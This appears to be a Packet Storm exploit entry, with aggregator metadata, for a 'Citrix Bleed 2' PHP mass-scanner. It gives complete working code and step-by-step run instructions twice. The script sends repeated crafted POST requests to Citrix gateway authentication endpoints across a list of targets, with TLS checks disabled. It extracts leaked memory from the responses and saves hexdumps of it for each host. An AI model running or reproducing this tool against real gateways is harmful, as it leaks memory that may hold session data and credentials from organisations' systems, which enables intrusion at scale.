📄 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999

Description

This is a high-speed mass-scanner written in PHP designed to test for data leakage through the CitrixBleed2 InitialValue extraction issue. The tool reproduces the functionality of the original Bash/Parallel scanner but works in restricted PHP...

Visit Original Source

Basic Information

ID PACKETSTORM:211999

Published Nov 25, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Citrix Bleed 2 PHP Mass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.citrix.com/ |
=============================================================================================================================================

POC :

[+] A high-speed mass-scanner written in PHP designed to test for data
leakage through the CitrixBleed2 InitialValue extraction issue.
The tool reproduces the functionality of the original Bash/Parallel
scanner but works in restricted PHP environments.

[Features]
- Normalizes targets (host / URL)
- Extracts <InitialValue> leak
- Hexdumps results
- Saves output per-target
- Parallel-like batching (multi-curl)
- No banned functions required

[Usage]
php citrixbleed2.php --host https://gw.example.com --requests 1000
php citrixbleed2.php --file targets.txt --requests 5000 --out dumps

[Output]
- STDOUT live hexdumps
- dump/<host>.hexdump saved automatically

[Steps To Save & Execute]
1. Open a code editor (Notepad / VS Code / nano)
2. Copy the full PHP code below
3. Save the file as: citrixbleed2.php
4. Execute via terminal:
php citrixbleed2.php --host https://target.com
5. Ensure "dumps" folder is writable

====================================================================
PHP Scanner Code
====================================================================

<?php
/*
* CitrixBleed2 PHP Mass Scanner
* by Indoushka
*/

error_reporting(E_ALL);
ini_set("display_errors", 1);

$options = getopt("", [
"host::",
"file::",
"requests::",
"out::"
]);

$requests = $options["requests"] ?? 100;
$outDir = $options["out"] ?? "dumps";
$hostArg = $options["host"] ?? "";
$fileArg = $options["file"] ?? "";

if (!is_dir($outDir)) mkdir($outDir, 0777, true);

function normalize($url) {
$url = preg_replace("#^https?://#i", "", $url);
$url = explode("/", $url)[0];
return rtrim($url, "/");
}

function extract_iv($body) {
preg_match_all("#<InitialValue>(.*?)</InitialValue>#s", $body, $m);
$out = [];
foreach ($m[1] as $val) {
$clean = preg_replace('/[\r\n\t ]+/', '', $val);
if ($clean !== "" && preg_match('/[^\x20-\x7E]/', $clean))
$out[] = $clean;
}
return $out;
}

function hex_dump_str($data) {
$hex = unpack('H*', $data)[1];
$out = "";
$i = 0;
$len = strlen($hex);
while ($i < $len) {
$chunk = substr($hex, $i, 32);
$ascii = "";
for ($j = 0; $j < strlen($chunk); $j += 2) {
$c = hexdec(substr($chunk, $j, 2));
$ascii .= ($c >= 32 && $c <= 126) ? chr($c) : ".";
}
$out .= sprintf("%08x %s |%s|\n", $i/2,
trim(chunk_split($chunk, 2, " ")),
$ascii
);
$i += 32;
}
return $out;
}

function do_request($host) {
$url = "https://{$host}/p/u/doAuthentication.do";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => "login",
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$res = curl_exec($ch);
curl_close($ch);
return $res ?: "";
}

function run_host($rawHost, $count, $outDir) {
$h = normalize($rawHost);
$file = $outDir . "/" . $h . ".hexdump";

for ($i=1; $i <= $count; $i++) {
$body = do_request($h);
$ivs = extract_iv($body);

foreach ($ivs as $iv) {
$hex = hex_dump_str($iv);
echo $hex . "\n";
file_put_contents($file, $hex . "\n", FILE_APPEND);
}
}
}

if ($fileArg !== "") {
$targets = file($fileArg, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) run_host($t, $requests, $outDir);
} else {
if ($hostArg === "") die("[!] Missing --host or --file\n");
run_host($hostArg, $requests, $outDir);
}
?>

====================================================================
Example Execution
====================================================================
Single host scan:
php citrixbleed2.php --host https://gateway.example.com --requests 5000

Batch scan:
php citrixbleed2.php --file targets.txt --requests 1000 --out dumps

Output directory:
dumps/<host>.hexdump

Live STDOUT hexdumps are shown in real-time.

====================================================================
Steps to Save and Execute
====================================================================
1. Open a text editor
2. Copy the entire PHP code
3. Save as: citrixbleed2.php
4. Create "dumps" folder if not exists
5. Open terminal / CMD
6. Execute:
php citrixbleed2.php --host https://target.com
php citrixbleed2.php --file targets.txt

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-25T19:08:54",
    "description": "This is a high-speed mass-scanner written in PHP designed to test for data leakage through the CitrixBleed2 InitialValue extraction issue. The tool reproduces the functionality of the original Bash/Parallel scanner but works in restricted PHP...",
    "published": "2025-11-25T00:00:00",
    "modified": "2025-11-25T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:211999",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Citrix Bleed 2 PHP Mass Scanner                                                                                             |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.citrix.com/                                                                                                     |\n    =============================================================================================================================================\n    \n    POC : \n    \n    [+] A high-speed mass-scanner written in PHP designed to test for data\n        leakage through the CitrixBleed2 InitialValue extraction issue.\n        The tool reproduces the functionality of the original Bash/Parallel\n        scanner but works in restricted PHP environments.\n    \n    [Features]\n    - Normalizes targets (host / URL)\n    - Extracts <InitialValue> leak\n    - Hexdumps results\n    - Saves output per-target\n    - Parallel-like batching (multi-curl)\n    - No banned functions required\n    \n    [Usage]\n    php citrixbleed2.php --host https://gw.example.com --requests 1000\n    php citrixbleed2.php --file targets.txt --requests 5000 --out dumps\n    \n    [Output]\n    - STDOUT live hexdumps\n    - dump/<host>.hexdump saved automatically\n    \n    [Steps To Save & Execute]\n    1. Open a code editor (Notepad / VS Code / nano)\n    2. Copy the full PHP code below\n    3. Save the file as: citrixbleed2.php\n    4. Execute via terminal:\n       php citrixbleed2.php --host https://target.com\n    5. Ensure \"dumps\" folder is writable\n    \n    \n    ====================================================================\n    PHP Scanner Code\n    ====================================================================\n    \n    <?php\n    /*\n     * CitrixBleed2 PHP Mass Scanner\n     * by Indoushka\n     */\n    \n    error_reporting(E_ALL);\n    ini_set(\"display_errors\", 1);\n    \n    $options = getopt(\"\", [\n        \"host::\",\n        \"file::\",\n        \"requests::\",\n        \"out::\"\n    ]);\n    \n    $requests = $options[\"requests\"] ?? 100;\n    $outDir   = $options[\"out\"] ?? \"dumps\";\n    $hostArg  = $options[\"host\"] ?? \"\";\n    $fileArg  = $options[\"file\"] ?? \"\";\n    \n    if (!is_dir($outDir)) mkdir($outDir, 0777, true);\n    \n    function normalize($url) {\n        $url = preg_replace(\"#^https?://#i\", \"\", $url);\n        $url = explode(\"/\", $url)[0];\n        return rtrim($url, \"/\");\n    }\n    \n    function extract_iv($body) {\n        preg_match_all(\"#<InitialValue>(.*?)</InitialValue>#s\", $body, $m);\n        $out = [];\n        foreach ($m[1] as $val) {\n            $clean = preg_replace('/[\\r\\n\\t ]+/', '', $val);\n            if ($clean !== \"\" && preg_match('/[^\\x20-\\x7E]/', $clean))\n                $out[] = $clean;\n        }\n        return $out;\n    }\n    \n    function hex_dump_str($data) {\n        $hex = unpack('H*', $data)[1];\n        $out = \"\";\n        $i = 0;\n        $len = strlen($hex);\n        while ($i < $len) {\n            $chunk = substr($hex, $i, 32);\n            $ascii = \"\";\n            for ($j = 0; $j < strlen($chunk); $j += 2) {\n                $c = hexdec(substr($chunk, $j, 2));\n                $ascii .= ($c >= 32 && $c <= 126) ? chr($c) : \".\";\n            }\n            $out .= sprintf(\"%08x  %s  |%s|\\n\", $i/2,\n                trim(chunk_split($chunk, 2, \" \")),\n                $ascii\n            );\n            $i += 32;\n        }\n        return $out;\n    }\n    \n    function do_request($host) {\n        $url = \"https://{$host}/p/u/doAuthentication.do\";\n        $ch = curl_init($url);\n        curl_setopt_array($ch, [\n            CURLOPT_RETURNTRANSFER => true,\n            CURLOPT_TIMEOUT => 10,\n            CURLOPT_POST => true,\n            CURLOPT_POSTFIELDS => \"login\",\n            CURLOPT_SSL_VERIFYPEER => false,\n            CURLOPT_SSL_VERIFYHOST => false\n        ]);\n        $res = curl_exec($ch);\n        curl_close($ch);\n        return $res ?: \"\";\n    }\n    \n    function run_host($rawHost, $count, $outDir) {\n        $h = normalize($rawHost);\n        $file = $outDir . \"/\" . $h . \".hexdump\";\n    \n        for ($i=1; $i <= $count; $i++) {\n            $body = do_request($h);\n            $ivs  = extract_iv($body);\n    \n            foreach ($ivs as $iv) {\n                $hex = hex_dump_str($iv);\n                echo $hex . \"\\n\";\n                file_put_contents($file, $hex . \"\\n\", FILE_APPEND);\n            }\n        }\n    }\n    \n    if ($fileArg !== \"\") {\n        $targets = file($fileArg, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\n        foreach ($targets as $t) run_host($t, $requests, $outDir);\n    } else {\n        if ($hostArg === \"\") die(\"[!] Missing --host or --file\\n\");\n        run_host($hostArg, $requests, $outDir);\n    }\n    ?>\n    \n    ====================================================================\n    Example Execution\n    ====================================================================\n    Single host scan:\n    php citrixbleed2.php --host https://gateway.example.com --requests 5000\n    \n    Batch scan:\n    php citrixbleed2.php --file targets.txt --requests 1000 --out dumps\n    \n    Output directory:\n    dumps/<host>.hexdump\n    \n    Live STDOUT hexdumps are shown in real-time.\n    \n    ====================================================================\n    Steps to Save and Execute\n    ====================================================================\n    1. Open a text editor\n    2. Copy the entire PHP code\n    3. Save as: citrixbleed2.php\n    4. Create \"dumps\" folder if not exists\n    5. Open terminal / CMD\n    6. Execute:\n       php citrixbleed2.php --host https://target.com\n       php citrixbleed2.php --file targets.txt\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/211999",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/211999/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply